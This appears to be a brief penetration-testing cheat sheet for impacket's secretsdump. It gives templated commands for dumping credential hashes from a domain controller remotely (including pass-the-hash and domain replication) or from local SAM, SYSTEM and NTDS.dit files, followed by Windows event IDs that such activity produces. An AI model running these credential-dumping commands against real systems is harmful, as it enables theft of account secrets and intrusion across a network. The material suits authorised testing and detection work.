https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py
impacket-secretsdump -dc-ip <dcIp> <domain>/<user>:<password>@<rhost> -history
impacket-secretsdump -hashes :<ntlmHash> -dc-ip <dcIp> <domain>/<user>@<rhost>
impacket-secretsdump -just-dc <domain>/<user>:<password>@<rhost>
impacket-secretsdump -just-dc <domain>/<user>:<password>@<rhost> -just-dc-user <user>
impacket-secretsdump -system <systemFile> -sam <samFile> -security <securityFile> LOCAL
impacket-secretsdump -ntds <ntdsFile> -system <systemFile> LOCAL
Windows Security Log Event IDs
-Logon (4624)
-Logoff (4634)
-Special Logon (4672)
Windows System Logs
Service Control Manager (7040) -> multiple